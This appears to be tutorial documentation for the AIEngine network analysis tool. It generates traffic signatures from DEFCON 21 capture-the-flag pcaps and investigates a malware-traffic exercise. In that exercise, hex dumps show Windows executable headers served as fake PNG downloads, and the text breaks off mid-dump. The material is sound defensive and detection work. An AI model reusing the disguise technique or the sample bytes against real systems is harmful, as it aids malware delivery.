Now we are under control of the internal shell of the engine and we can access to the different components.
>>> print(dm)
DomainNameManager (Generic Domain Name Manager)
Name:Generic net queries Domain:.net Matchs:10
Name:Generic org queries Domain:.org Matchs:0
Name:Generic com queries Domain:.com Matchs:21
>>>
And now we inject a callback function for one of the given domains.
>>> def my_callback(flow):
... d = flow.dns_info
... if (d):
... print(str(d))
...
>>> d3.callback = my_callback
>>>
And wait for domains that ends on .org
>>> Domain:www.gnu.org
also verify the rest of the components
>>> print(d2)
Name:Generic org queries Domain:.org Matchs:1 Callback:<function my_callback 0x023ffeea378>
>>> print(dm)
DomainNameManager (Generic Domain Name Manager)
Name:Generic net queries Domain:.net Matchs:14
Name:Generic org queries Domain:.org Matchs:1 Callback:<function my_callback 0x023ffeea378>
Name:Generic com queries Domain:.com Matchs:21
Extracting information¶
By using the traces from the defcon21 we will try to find signatures on a easy way.
For extracting information we will use the FrequencyEngine and the LearnerEngine. These two engines allow us to find signatures of unknown traffic such as new malware, traffic signatures and so on.
Frequencies optional arguments:
-F [ --enable-frequencies ] Enables the Frequency engine.
-g [ --group-by ] arg (=dst-port) Groups frequencies by
src-ip,dst-ip,src-port and dst-port.
-f [ --flow-type ] arg (=tcp) Uses tcp or udp flows.
-L [ --enable-learner ] Enables the Learner engine.
-k [ --key-learner ] arg (=80) Sets the key for the Learner engine.
-b [ --buffer-size ] arg (=64) Sets the size of the internal buffer for
generate the regex.
-y [ --enable-yara ] Generates a yara signature.
Now first we see the traffic distribution by grouping by destination IP.
./aiengine -i /defcon21/european_defcon/ -F -g dst-ip
3 [0x7f2ec98fe760] INFO aiengine.stacklan null - Lan network stack ready.
1167 [0x7f2ec98fe760] INFO aiengine.stacklan null - Enable FrequencyEngine on Lan network stack
1168 [0x7f2ec98fe760] INFO aiengine.packetdispatcher null - processing packets from:/defcon21/european_defcon//euronop_00092_20130802191248.cap
1586 [0x7f2ec98fe760] INFO aiengine.packetdispatcher null - processing packets from:/defcon21/european_defcon//euronop_00031_20130802140748.cap
1612 [0x7f2ec98fe760] INFO aiengine.packetdispatcher null - processing packets from:/defcon21/european_defcon//euronop_00049_20130802153748.cap
...
Aggregating frequencies by destination IP
Computing frequencies by destination IP
Frequency Group(by destination IP) total frequencies groups:32
Total process flows:30599
Total computed frequencies:32
Key Flows Bytes Dispersion Enthropy
10.3.1.5 292 867421 12 0
10.5.1.2 650 2661026 48 0
10.5.10.2 645 1583049 40 0
10.5.11.2 675 1778046 41 0
10.5.12.2 670 9860998 42 0
10.5.13.2 664 2852632 48 0
10.5.14.118 9 276131 89 -105.036
10.5.14.119 2 703 14 0
10.5.14.12 1 2511 44 0
10.5.14.2 649 2927839 48 0
10.5.15.2 640 1852931 44 0
10.5.16.2 665 2835281 40 0
10.5.17.2 676 5620496 48 0
10.5.18.2 664 1710898 41 0
10.5.19.2 676 1797309 43 0
10.5.2.2 671 1494479 41 0
10.5.20.2 647 1502374 39 0
10.5.3.2 668 1676005 41 0
10.5.4.2 658 5795289 52 0
10.5.5.2 675 1533368 37 0
10.5.6.2 662 7079837 47 0
10.5.7.12 1 1661 27 0
10.5.7.13 4 322 4 0
10.5.7.15 3 2265 9 0
10.5.7.17 90 247224 44 0
10.5.7.2 17590 220311075 30 0
10.5.8.2 679 2201575 40 0
10.5.8.25 5 20882 56 0
10.5.9.13 1 1537 38 0
10.5.9.14 2 699 15 0
10.5.9.16 2 699 15 0
10.5.9.2 663 2468757 48 0
So aiengine have been capable of analyzing 30599 TCP flows and grouping by 32 IPs. Now lets get an IP with flows and bytes, for example 10.5.7.2, and execute again aiengine but with a different grouping.
./aiengine -i /defcon21/european_defcon/ -F -g dst-ip -L -k "10.5.7.2"
...
Aggregating 17590 to the LearnerEngine
Regular expression generated with key:10.5.7.2
Regex:^\x5b\x45\x52\x52\x4f\x52\x5d\x20\x69\x70\x76\x34\x20\x62\x69\x6e\x64\x28\x29\x20\x66\x61\x69\x6c\x65\x64\x20\x36\x32\x0a\x5d\x20\x69\x70\x76\x34\x20\x62\x69\x6e\x64\x28\x29\x20\x66\x61\x69\x6c\x65\x64\x20\x36\x32\x0a\x5b\x45\x52\x52\x4f\x52\x5d\x20\x69\x70
Ascii buffer:[ERROR] ipv4 bind() failed 62
] ipv4 bind() failed 62
[ERROR] ip
So it seems that the machine 10.5.7.2 is generating some kind of error binding, don’t have two much sense but the regex generated is valid for identify that traffic.
Lets analyze another directory
./aiengine -i /pwningyeti/ -F -g dst-ip,dst-port
5 [0x7f6583946760] INFO aiengine.stacklan null - Lan network stack ready.
1164 [0x7f6583946760] INFO aiengine.stacklan null - Enable FrequencyEngine on Lan network stack
1189 [0x7f6583946760] INFO aiengine.packetdispatcher null - processing packets from:/tmp/pwningyeti//pwningyeti_00001_20130802113656.cap
1199 [0x7f6583946760] INFO aiengine.packetdispatcher null - processing packets from:/tmp/pwningyeti//pwningyeti_00001_20130802113748.cap
1203 [0x7f6583946760] INFO aiengine.packetdispatcher null - processing packets from:/tmp/wningyeti//pwningyeti_00002_20130802113659.cap
1208 [0x7f6583946760] INFO aiengine.packetdispatcher null - processing packets from:/tmp/pwningyeti//pwningyeti_00002_20130802114248.cap
...
Aggregating frequencies by destination IP and port
Computing frequencies by destination IP and port
Frequency Group(by destination IP and port) total frequencies groups:156
Total process flows:8755
Total computed frequencies:156
Key Flows Bytes Dispersion Enthropy
10.3.1.5:443 3482 16521854 15 0
10.5.14.2:34872 1 15275 17 0
10.5.17.250:53230 1 74 3 0
10.5.17.250:54359 1 3949 26 0
10.5.17.250:54555 1 3949 26 0
10.5.17.250:57654 1 390 11 0
10.5.17.250:57711 1 390 11 0
10.5.17.250:57718 1 390 11 0
10.5.17.250:58251 1 6521 39 0
10.5.17.250:58328 1 159 3 0
10.5.17.250:58952 1 1998 19 0
10.5.17.250:60286 1 37 3 0
10.5.17.2:1011 2 16632 9 -8.75489
10.5.17.2:10215 1 984 9 0
10.5.17.2:1025 1 1620 5 0
10.5.17.2:1029 1 13944 9 -47.6257
And now we choose destination IP and port.
./aiengine -i /pwningyeti/ -F -g dst-ip,dst-port -L -k 10.5.17.2:4321
5 [0x7f6583946760] INFO aiengine.stacklan null - Lan network stack ready.
1164 [0x7f6583946760] INFO aiengine.stacklan null - Enable FrequencyEngine on Lan network stack
1189 [0x7f6583946760] INFO aiengine.packetdispatcher null - processing packets from:/tmp/pwningyeti//pwningyeti_00001_20130802113656.cap
1199 [0x7f6583946760] INFO aiengine.packetdispatcher null - processing packets from:/tmp/pwningyeti//pwningyeti_00001_20130802113748.cap
1203 [0x7f6583946760] INFO aiengine.packetdispatcher null - processing packets from:/tmp/wningyeti//pwningyeti_00002_20130802113659.cap
1208 [0x7f6583946760] INFO aiengine.packetdispatcher null - processing packets from:/tmp/pwningyeti//pwningyeti_00002_20130802114248.cap
...
Aggregating frequencies by destination IP and port
...
Aggregating 1675 to the LearnerEngine
Regular expression generated with key:10.5.17.2:4321
Regex:^\x43\x6f\x6e\x6e\x65\x63\x74\x20\x74\x6f\x20\x35\x8b\x52\x30\x8b\x20\x74\x6f\x20\x76\x69\x65\x77\x20\x74\x68\x65\x20\x64\x69\x73\x70\x6c\x61\x79\x2e\x0a\x31\x20\x29\x20\x43\x68\x61\x6e\x67\x65\x20\x64\x69\x73\x70\x6c\x61\x79\x20\x74\x65\x78\x74\x2e\x0a\x32
Ascii buffer:Connect to 5<8b>R0<8b> to view the display.
1 ) Change display text.
2
Malware analysis part 1¶
One of the benefits of using the engine is the easy to analyze malware just by using the binary form. For this example, we are using the sample provided by the fantastic blog (http://www.malware-traffic-analysis.net/) and illustrating how detect the malware.
Without knowing anything about the sample we just make a deep analysis on the HTTP component of the pcap file. For clarity on the example I just remove some of the output and substitute with .... points for keep the analysis short.
./aiengine -i /tmp/2016-07-07-traffic-analysis-exercise.pcap -P http -s 5
AIEngine running on Linux kernel 4.6.4-201.fc23.x86_64
GCC version:5.3.1 Pcre version:8.39 Boost version:1.58
[07/07/16 19:20:45] Lan network stack ready.
[07/07/16 19:20:45] Processing packets from file /tmp/2016-07-07-traffic-analysis-exercise.pcap
[07/07/16 19:20:45] Stack 'Lan network stack' using 971 KBytes of memory
PacketDispatcher(0x1cc6890) statistics
Connected to Lan network stack
Total packets: 9130
Total bytes: 6254270
HTTPProtocol(0x1cc7ab0) statistics
Total allocated: 252 KBytes
Total packets: 2963
Total bytes: 3787977
Total L7 bytes: 1982617
Total validated packets: 80
Total malformed packets: 23
Total allow hosts: 123
Total banned hosts: 0
Total requests: 123
Total responses: 116
HTTP Methods
Total gets: 122
Total posts: 1
Total heads: 0
Total connects: 0
Total options: 0
Total puts: 0
Total deletes: 0
Total traces: 0
Total others: 3
HTTP Responses
....
Total found: 41
Total moved permanently: 1
Total multiple choices: 0
Total use proxy: 0
Total im used: 0
Total already reported: 0
Total no response: 0
Total multi-status: 0
Total partial content: 0
Total reset content: 0
Total network connect timeout error: 0
Total no content: 11
Total network read timeout error: 0
Total login timeout: 0
Total non-authoritative information: 0
Total accepted: 0
Total created: 0
Total ok: 62
....
FlowForwarder(0x1cd2b50) statistics
Plugged to object(0x1cc7ab0)
Total forward flows: 0
Total received flows: 80
Total fail flows: 0
HTTP Info Cache statistics
Total items: 695
Total allocated: 102 KBytes
Total current alloc: 92 KBytes
Total acquires: 80
Total releases: 7
Total fails: 0
Uri cache statistics
Total items: 646
Total allocated: 30 KBytes
Total current alloc: 25 KBytes
Total acquires: 122
Total releases: 0
Total fails: 0
Host cache statistics
Total items: 715
Total allocated: 30 KBytes
Total current alloc: 27 KBytes
Total acquires: 53
Total releases: 0
Total fails: 0
UserAgent cache statistics
Total items: 764
Total allocated: 30 KBytes
Total current alloc: 29 KBytes
Total acquires: 4
Total releases: 0
Total fails: 0
ContentType cache statistics
Total items: 759
Total allocated: 30 KBytes
Total current alloc: 29 KBytes
Total acquires: 9
Total releases: 0
Total fails: 0
File cache statistics
Total items: 762
Total allocated: 30 KBytes
Total current alloc: 29 KBytes
Total acquires: 6
Total releases: 0
Total fails: 0
HTTP Uris usage
....
Uri:/passback/np/fef5cc810754ff8f0465298ac2146c16.js:1
Uri:/pagead/js/lidar.js:1
Uri:/orbserv/hbpix?pixId=5392&cckz=true:1
Uri:/orbserv/hbpix?pixId=5392:1
Uri:/ncsi.txt:1
Uri:/match?excid=11&cijs=1:1
Uri:/bh/rtset?do=add&pid=531399&ev=172e2h769t7pz:1
....
HTTP Hosts usage
....
Host:pixel.quantserve.com:3
Host:tags.tagcade.com:2
Host:match.adsrvr.org:2
Host:serve.tagcade.com:2
Host:idpix.media6degrees.com:2
Host:sync.mathtag.com:2
Host:cm.g.doubleclick.net:2
Host:cm.adgrx.com:2
Host:zt.1rx.io:1
Host:track.eyeviewads.com:1
Host:tr.contextweb.com:1
....
HTTP UserAgents usage
UserAgent:Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36:76
UserAgent:Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0):2
UserAgent:Microsoft NCSI:1
UserAgent:Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko:1
HTTP ContentTypes usage
ContentType:application/javascript:1
ContentType:application/x-javascript:1
ContentType:application/x-www-form-urlencoded:1
ContentType:image/gif:1
ContentType:image/jpeg:1
ContentType:image/png:1
ContentType:text/html:1
ContentType:text/javascript:1
ContentType:text/plain:1
HTTP Filenames usage
Filename:572fe.png:1
Filename:6b74e.png:1
Filename:7302d.png:1
Filename:7d424dc12a.png:1
Filename:b648580daeed68.png:1
Filename:f.txt:1
Exiting process
According to the output we have some png files and just one content type associated to this files.
Lets write a regular expression to find the connection that belongs to this download/upload files.
./aiengine -i /tmp/2016-07-07-traffic-analysis-exercise.pcap -R -r "^HTTP.*\.png" -m
AIEngine running on Linux kernel 4.6.4-201.fc23.x86_64
GCC version:5.3.1 Pcre version:8.39 Boost version:1.58
[07/07/16 19:23:10] Lan network stack ready.
[07/07/16 19:23:10] Enable NIDSEngine on Lan network stack
[07/07/16 19:23:10] Processing packets from file /tmp/2016-07-07-traffic-analysis-exercise.pcap
[07/27/16 15:23:10] Stack 'Lan network stack' using 971 KBytes of memory
TCP Flow:[172.16.1.126:49158:6:184.107.174.122:80] pkts:5 matchs with (0x15d59c0)Regex [experimental0]
PacketDispatcher(0x1440bb0) statistics
Connected to Lan network stack
Total packets: 9130
Total bytes: 6254270
RegexManager(0x15d58f0) statistics
Regex:experimental0 matches:1
Exiting process
This shows that the conversation 172.16.1.126:49158:6:184.107.174.122:80 matches with the provided regular expression. Lets see if that conversation have more downloads (-C parameter)
./aiengine -i /tmp/2016-07-07-traffic-analysis-exercise.pcap -R -r "^HTTP.*\.png" -m -C
AIEngine running on Linux kernel 4.6.4-201.fc23.x86_64
GCC version:5.3.1 Pcre version:8.39 Boost version:1.58
[07/07/16 19:23:18] Lan network stack ready.
[07/07/16 19:23:18] Enable NIDSEngine on Lan network stack
[07/07/16 19:23:18] Processing packets from file /tmp/2016-07-07-traffic-analysis-exercise.pcap
[07/27/16 15:23:18] Stack 'Lan network stack' using 971 KBytes of memory
TCP Flow:[172.16.1.126:49158:6:184.107.174.122:80] pkts:5 matchs with (0x14b9ab0)Regex [experimental0]
TCP Flow:[172.16.1.126:49158:6:184.107.174.122:80] pkts:378 matchs with (0x14b9ab0)Regex [experimental0]
TCP Flow:[172.16.1.126:49158:6:184.107.174.122:80] pkts:581 matchs with (0x14b9ab0)Regex [experimental0]
TCP Flow:[172.16.1.126:49158:6:184.107.174.122:80] pkts:643 matchs with (0x14b9ab0)Regex [experimental0]
TCP Flow:[172.16.1.126:49158:6:184.107.174.122:80] pkts:2585 matchs with (0x14b9ab0)Regex [experimental0]
PacketDispatcher(0x1323150) statistics
Connected to Lan network stack
Total packets: 9130
Total bytes: 6254270
RegexManager(0x14b99e0) statistics
Regex:experimental0 matches:5
Exiting process
So according to the information shown, the conversation have 5 downloads of “something”. Lets dig into it.
./aiengine -i /tmp/2016-07-07-traffic-analysis-exercise.pcap -R -r "^HTTP.*\.png" -m -C -M
AIEngine running on Linux kernel 4.6.4-201.fc23.x86_64
GCC version:5.3.1 Pcre version:8.39 Boost version:1.58
[07/07/16 19:23:26] Lan network stack ready.
[07/07/16 19:23:26] Enable NIDSEngine on Lan network stack
[07/07/16 19:23:26] Processing packets from file /tmp/2016-07-07-traffic-analysis-exercise.pcap
[07/27/16 15:23:26] Stack 'Lan network stack' using 971 KBytes of memory
TCP Flow:[172.16.1.126:49158:6:184.107.174.122:80] pkts:5 matchs with (0x14b3be0)Regex [experimental0]
48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d HTTP/1.1 200 OK.
0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a .Content-Length:
20 32 37 30 33 38 33 0d 0a 43 6f 6e 74 65 6e 74 270383..Content
2d 54 79 70 65 3a 20 69 6d 61 67 65 2f 70 6e 67 -Type: image/png
0d 0a 53 65 72 76 65 72 3a 20 4d 69 63 72 6f 73 ..Server: Micros
6f 66 74 2d 49 49 53 2f 37 2e 35 0d 0a 58 2d 50 oft-IIS/7.5..X-P
6f 77 65 72 65 64 2d 42 79 3a 20 50 48 50 2f 35 owered-By: PHP/5
2e 34 2e 31 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 .4.14..Content-D
69 73 70 6f 73 69 74 69 6f 6e 3a 20 61 74 74 61 isposition: atta
63 68 6d 65 6e 74 3b 20 66 69 6c 65 6e 61 6d 65 chment; filename
3d 35 37 32 66 65 2e 70 6e 67 0d 0a 58 2d 50 6f =572fe.png..X-Po
77 65 72 65 64 2d 42 79 3a 20 41 53 50 2e 4e 45 wered-By: ASP.NE
54 0d 0a 44 61 74 65 3a 20 57 65 64 2c 20 30 36 T..Date: Wed, 06
20 4a 75 6c 20 32 30 31 36 20 30 30 3a 31 33 3a Jul 2016 00:13:
34 33 20 47 4d 54 0d 0a 0d 0a 4d 5a 90 00 03 00 43 GMT....MZ....
00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 ................
00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 ..@.............
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 ................
09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f ..!..L.!This pro
67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 gram cannot be r
75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d un in DOS mode..
0d 0a 24 00 00 00 00 00 00 00 7d e6 a3 d9 39 87 ..$.......}...9.
cd 8a 39 87 cd 8a 39 87 cd 8a ba 9b c3 8a 38 87 ..9...9.......8.
cd 8a 50 98 c4 8a 3f 87 cd 8a d0 98 c0 8a 38 87 ..P...?.......8.
cd 8a 52 69 63 68 39 87 cd 8a 00 00 00 00 00 00 ..Rich9.........
00 00 50 45 00 00 4c 01 03 00 f4 03 7c 57 00 00 ..PE..L.....|W..
00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 70 ...............p
00 00 00 40 00 00 00 00 00 00 38 14 00 00 00 10 ...@......8.....
00 00 00 80 00 00 00 00 40 00 00 10 00 00 00 10 ........@.......
00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 ................
00 00 00 c0 00 00 00 10 00 00 22 c5 00 00 02 00 ..........".....
00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 ................
00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 ................
00 00 24 78 00 00 28 00 00 00 00 90 00 00 20 2a ..$x..(....... *
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 00 28 02 00 00 20 00 00 00 00 10 00 00 68 01 ..(... .......h.
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 ...........text.
00 00 c4 6e 00 00 00 10 00 00 00 70 00 00 00 10 ...n.......p....
00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 .............. .
00 60 2e 64 61 74 61 00 00 00 bc 0c 00 00 00 80 .`.data.........
00 00 00 10 00 00 00 80 00 00 00 00 00 00 00 00 ................
00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 ......@....rsrc.
00 00 20 2a 00 00 00 90 00 00 00 30 00 00 00 90 .. *.......0....
00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 ..............@.
00 40 6c da 5b 4a 10 00 00 00 00 00 00 00 00 00 .@l.[J..........
00 00 4d 53 56 42 56 4d 36 30 2e 44 4c 4c 00 00 ..MSVBVM60.DLL..
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 00 00 00 ...
TCP Flow:[172.16.1.126:49158:6:184.107.174.122:80] pkts:378 matchs with (0x14b3be0)Regex [experimental0]
48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d HTTP/1.1 200 OK.
0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a .Content-Length:
20 31 34 37 34 35 36 0d 0a 43 6f 6e 74 65 6e 74 147456..Content
2d 54 79 70 65 3a 20 69 6d 61 67 65 2f 70 6e 67 -Type: image/png
0d 0a 53 65 72 76 65 72 3a 20 4d 69 63 72 6f 73 ..Server: Micros
6f 66 74 2d 49 49 53 2f 37 2e 35 0d 0a 58 2d 50 oft-IIS/7.5..X-P
6f 77 65 72 65 64 2d 42 79 3a 20 50 48 50 2f 35 owered-By: PHP/5
2e 34 2e 31 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 .4.14..Content-D
69 73 70 6f 73 69 74 69 6f 6e 3a 20 61 74 74 61 isposition: atta
63 68 6d 65 6e 74 3b 20 66 69 6c 65 6e 61 6d 65 chment; filename
3d 37 64 34 32 34 64 63 31 32 61 2e 70 6e 67 0d =7d424dc12a.png.
0a 58 2d 50 6f 77 65 72 65 64 2d 42 79 3a 20 41 .X-Powered-By: A
53 50 2e 4e 45 54 0d 0a 44 61 74 65 3a 20 57 65 SP.NET..Date: We
64 2c 20 30 36 20 4a 75 6c 20 32 30 31 36 20 30 d, 06 Jul 2016 0
30 3a 31 33 3a 34 33 20 47 4d 54 0d 0a 0d 0a 4d 0:13:43 GMT....M
5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 Z...............
00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 .......@........
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 00 00 00 00 00 00 00 00 00 00 f8 00 00 00 0e ................
1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 .......!..L.!Thi
73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 s program cannot
20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d be run in DOS m
6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a9 ode....$........
be 53 a4 ed df 3d f7 ed df 3d f7 ed df 3d f7 69 .S...=...=...=.i
d3 5d f7 20 df 3d f7 82 c0 36 f7 33 df 3d f7 05 .]. .=...6.3.=..
c0 39 f7 4b df 3d f7 7a fc 78 f7 c7 df 3d f7 cd .9.K.=.z.x...=..
a6 46 f7 5a df 3d f7 12 ff 38 f7 0b df 3d f7 ed .F.Z.=...8...=..
df 3c f7 de df 3d f7 f8 d2 62 f7 af df 3d f7 e8 .<...=...b...=..
d3 61 f7 55 df 3d f7 52 69 63 68 ed df 3d f7 00 .a.U.=.Rich..=..
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 3d .......PE..L...=
db 31 57 00 be 00 00 00 00 00 00 e0 00 0f 01 0b .1W.............
01 06 00 00 70 00 10 00 c0 01 00 00 00 00 00 60 ....p..........`
70 00 00 00 10 00 00 00 80 00 00 00 00 40 00 00 p............@..
10 00 00 00 10 00 00 04 00 00 00 00 00 90 00 04 ................
00 00 00 00 00 00 00 00 40 02 00 00 10 00 00 00 ........@.......
00 00 00 02 00 00 00 00 00 10 00 00 10 00 00 00 ................
00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 ................
00 00 00 00 00 00 00 60 87 00 00 8c 00 00 00 00 .......`........
a0 00 00 28 98 01 00 00 00 00 00 00 00 00 00 00 ...(............
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
80 00 00 7c 02 00 00 00 0a 00 00 55 00 00 00 00 ...|.......U....
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e ................
74 65 78 74 00 00 00 80 63 00 00 00 10 00 00 00 text....c.......
70 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 p...............
00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 ec ... ..`.rdata...
0d 00 00 00 80 00 00 00 10 00 00 00 80 00 00 00 ................
00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e ...........@..@.
64 61 74 61 00 00 00 14 01 00 00 00 90 00 00 00 data............
10 00 00 00 90 00 00 00 00 00 00 00 00 00 00 00 ................
00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 28 ...@....rsrc...(
98 01 00 00 a0 00 00 00 a0 01 00 00 a0 00 00 00 ................
00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 ...........@..@.
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 00 00 00 ...
TCP Flow:[172.16.1.126:49158:6:184.107.174.122:80] pkts:581 matchs with (0x14b3be0)Regex [experimental0]
48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d HTTP/1.1 200 OK.
0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a .Content-Length:
20 34 35 30 35 36 0d 0a 43 6f 6e 74 65 6e 74 2d 45056..Content-
54 79 70 65 3a 20 69 6d 61 67 65 2f 70 6e 67 0d Type: image/png.
0a 53 65 72 76 65 72 3a 20 4d 69 63 72 6f 73 6f .Server: Microso
